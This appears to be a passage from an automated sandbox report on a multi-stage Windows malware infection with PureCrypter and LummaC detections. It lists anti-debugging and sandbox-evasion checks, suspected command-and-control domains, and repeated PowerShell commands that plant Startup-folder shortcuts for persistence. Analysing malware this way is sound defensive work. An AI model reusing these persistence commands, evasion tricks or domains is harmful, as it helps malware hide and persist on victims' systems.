Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Process queried: DebugPort
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Process queried: DebugPort
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process queried: DebugPort

Source: C:\Users\user\DocumentsKECBGCGCGI.exe

Code function: 19_2_04A10C2A rdtsc

19_2_04A10C2A

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C83AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6C83AC62

Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Code function: 19_2_0065652B mov eax, dword ptr fs:[00000030h]	19_2_0065652B
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Code function: 19_2_0065A302 mov eax, dword ptr fs:[00000030h]	19_2_0065A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_007BA302 mov eax, dword ptr fs:[00000030h]	20_2_007BA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_007B652B mov eax, dword ptr fs:[00000030h]	20_2_007B652B

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C83AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6C83AC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 2232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: deb333ea90.exe PID: 2140, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: deb333ea90.exe PID: 5940, type: MEMORYSTR

Detected PureCrypter Trojan

Source: 06d4af6f50.exe, 0000001A.00000003.3474247717.0000000005352000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: {"ConfigIDs":"{\"ECS\":\"P-R-1082570-1-11,P-D-42388-2-6\",\"Edge\":\"P-X-1253166-4-5,P-X-1126445-2-5,P-X-1159506-2-5,P-X-1137521-3-11,P-X-1116674-11-34,P-X-1095018-2-6,P-X-1096650-2-6,P-X-1085156-1-3,P-X-1077147-1-9,P-X-1069756-2-8,P-X-1071593-2-4,P-X-1061902-3-17,P-X-1048071-1-5,P-X-1010579-1-9,P-X-1008556-23-102,P-X-1036081-1-3,P-X-1012411-2-9,P-X-97954-9-100,P-R-1068861-4-11,P-R-1008497-12-13,P-R-87486-2-17,P-R-67067-6-63,eej45377:646690,41612551:479862,cfg5e884:560003,eggf0128:472101,sendtabqr:498558,edauth0529:481519,9ffeg962:402950,domexpansion_v1:408272,ed0317:378541,producttrackingalertsettings_v1cf:458226,2chfa640:363442,edpas404:384675,hjd07315:315108,edenh823:312573,i8id9958:449025,v1_onlineselextraction:330872,edklo447:358232,linkui:481501\",\"EdgeConfig\":\"P-R-1457891-1-5,P-R-1279375-1-7,P-R-1221542-1-5,P-R-1176033-4-5,P-R-1174322-1-4,P-R-1129815-1-5,P-R-1148262-1-5,P-R-1147287-1-6,P-R-1136203-1-4,P-R-1133477-1-4,P-R-1130507-1-6,P-R-1113531-4-9,P-R-1099640-1-4,P-R-1098501-1-7,P-R-1090419-1-5,P-R-1082109-1-6,P-R-1082170-11-26,P-R-1052391-1-8,P-R-1039913-1-22,P-R-1036635-2-5,P-R-110491-24-85,P-R-68474-9-12,P-R-61206-14-20,P-R-61153-10-15,P-R-60617-7-21,P-R-45373-8-85,P-R-46265-41-108,P-D-1150672-1-4\",\"EdgeDomainActions\":\"P-R-1093245-1-19,P-R-1037936-1-14,P-R-1024693-1-11,P-R-108604-1-36,P-R-78306-1-18,P-R-73626-1-17,P-R-71025-5-13,P-R-63165-4-26,P-R-53243-2-7,P-R-40093-3-26,P-R-38744-7-97,P-R-31899-21-484,P-D-1138318-1-3,P-D-98331-6-32\",\"EdgeFirstRunConfig\":\"P-R-1075865-1-7\",\"Segmentation\":\"P-R-1159985-1-5,P-R-1113915-25-11,P-R-1098334-1-6,P-R-66078-1-3,P-R-66077-1-5,P-R-60882-1-2,P-R-43082-3-5,P-R-42744-1-2\"}","Edge":{"AccountLevelSyncReclaim":{"enableFeatures":["msAccountLevelSyncConsent","msNurturingAccountLevelSyncConsentSyncOff","msNurturingAccountLevelSyncConsentSyncOn"]},"AdsPlatformXEdgeexp":{"enableFeatures":["msEdgeAdPlatformUI","msEdgeAdPlatformBingPathsV3","msEdgeAdPlatformProtobufMigration","msEdgeAdPlatformUseIdentity"]},"ArrestUserChurn":{"enableFeatures":["msLoadChromeWebstoreByDefault"]},"DefaultBrowserBannerExternalStableRollout":{"enableFeatures":["msNurturingDefaultBrowserBannerCloseBtn","msNurturingUrlParser","msEdgeNurFIrisSupport"],"parameters":[{"name":"DismissalCap","value":"1000"}]},"DisablePageActionIcons":{"enableFeatures":["msOmniboxDisablePageActionIcons"],"parameters":[{"name":"msDisableOmniboxTriggeredIcon","value":"12,16"}]},"DisconnectedErrorPageVariations":{"enableFeatures":["msShowTroubleshootButtonOnErrorPage","msDisconnectedErrorPageVariation2"]},"EdgeOnRampShowVersionWhatsNew":{"enableFeatures":["msEdgeOnRampShowWhatsNew"],"parameters":[{"name":"Browser Version","value":"130.0.0.0"}]},"EdgeShoppingDomMutationExpansion":{"enableFeatures":["msShoppingExp67"]},"EdgeShoppingOnlineSelectorExtraction":{"enableFeatures":["msShoppingExp1"]},"EdgeVpnAllSites":{"enableFeatures":["msEnableVpnAllSites"]},"EnhancedTextContrast":{"enableFeatures":["msEnhancedTextContrast"]},"ExternalStoreZeroSearc

LummaC encrypted strings found

Source: 06d4af6f50.exe, 0000001A.00000002.3800113195.0000000000E71000.00000040.00000001.01000000.00000011.sdmp	String found in binary or memory: faintbl0w.sbs
Source: 06d4af6f50.exe, 0000001A.00000002.3800113195.0000000000E71000.00000040.00000001.01000000.00000011.sdmp	String found in binary or memory: 300snails.sbs
Source: 06d4af6f50.exe, 0000001A.00000002.3800113195.0000000000E71000.00000040.00000001.01000000.00000011.sdmp	String found in binary or memory: 3xc1aimbl0w.sbs
Source: 06d4af6f50.exe, 0000001A.00000002.3800113195.0000000000E71000.00000040.00000001.01000000.00000011.sdmp	String found in binary or memory: thicktoys.sbs

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsKECBGCGCGI.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsKECBGCGCGI.exe "C:\Users\user\DocumentsKECBGCGCGI.exe"
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe "C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe "C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe "C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\prua.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=06d4af6f50.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=06d4af6f50.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yiuq.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zzvy.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dslm.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tytb.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\akdz.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kncs.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\syie.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsap.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"

Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$ws = new-object -comobject wscript.shell; $s = $ws.createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\prua.lnk'); $s.targetpath = 'c:\users\user\appdata\local\temp\1006034001\mk.exe'; $s.save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$ws = new-object -comobject wscript.shell; $s = $ws.createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\yiuq.lnk'); $s.targetpath = 'c:\users\user\appdata\local\temp\1006034001\mk.exe'; $s.save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$ws = new-object -comobject wscript.shell; $s = $ws.createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\zzvy.lnk'); $s.targetpath = 'c:\users\user\appdata\local\temp\1006034001\mk.exe'; $s.save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$ws = new-object -comobject wscript.shell; $s = $ws.createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\dslm.lnk'); $s.targetpath = 'c:\users\user\appdata\local\temp\1006034001\mk.exe'; $s.save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$ws = new-object -comobject wscript.shell; $s = $ws.createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tytb.lnk'); $s.targetpath = 'c:\users\user\appdata\local\temp\1006034001\mk.exe'; $s.save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$ws = new-object -comobject wscript.shell; $s = $ws.createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\akdz.lnk'); $s.targetpath = 'c:\users\user\appdata\local\temp\1006034001\mk.exe'; $s.save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$ws = new-object -comobject wscript.shell; $s = $ws.createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\kncs.lnk'); $s.targetpath = 'c:\users\user\appdata\local\temp\1006034001\mk.exe'; $s.save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$ws = new-object -comobject wscript.shell; $s = $ws.createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\syie.lnk'); $s.targetpath = 'c:\users\user\appdata\local\temp\1006034001\mk.exe'; $s.save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$ws = new-object -comobject wscript.shell; $s = $ws.createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\xsap.lnk'); $s.targetpath = 'c:\users\user\appdata\local\temp\1006034001\mk.exe'; $s.save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$ws = new-object -comobject wscript.shell; $s = $ws.createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\prua.lnk'); $s.targetpath = 'c:\users\user\appdata\local\temp\1006034001\mk.exe'; $s.save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$ws = new-object -comobject wscript.shell; $s = $ws.createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\yiuq.lnk'); $s.targetpath = 'c:\users\user\appdata\local\temp\1006034001\mk.exe'; $s.save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$ws = new-object -comobject wscript.shell; $s = $ws.createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\zzvy.lnk'); $s.targetpath = 'c:\users\user\appdata\local\temp\1006034001\mk.exe'; $s.save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$ws = new-object -comobject wscript.shell; $s = $ws.createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\dslm.lnk'); $s.targetpath = 'c:\users\user\appdata\local\temp\1006034001\mk.exe'; $s.save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$ws = new-object -comobject wscript.shell; $s = $ws.createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tytb.lnk'); $s.targetpath = 'c:\users\user\appdata\local\temp\1006034001\mk.exe'; $s.save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$ws = new-object -comobject wscript.shell; $s = $ws.createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\akdz.lnk'); $s.targetpath = 'c:\users\user\appdata\local\temp\1006034001\mk.exe'; $s.save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$ws = new-object -comobject wscript.shell; $s = $ws.createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\kncs.lnk'); $s.targetpath = 'c:\users\user\appdata\local\temp\1006034001\mk.exe'; $s.save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$ws = new-object -comobject wscript.shell; $s = $ws.createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\syie.lnk'); $s.targetpath = 'c:\users\user\appdata\local\temp\1006034001\mk.exe'; $s.save()"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$ws = new-object -comobject wscript.shell; $s = $ws.createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\xsap.lnk'); $s.targetpath = 'c:\users\user\appdata\local\temp\1006034001\mk.exe'; $s.save()"

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C884760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

0_2_6C884760

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C761C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

0_2_6C761C30

Source: file.exe, file.exe, 00000000.00000002.2673685948.0000000001153000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: bProgram Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C83AE71 cpuid

0_2_6C83AE71

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
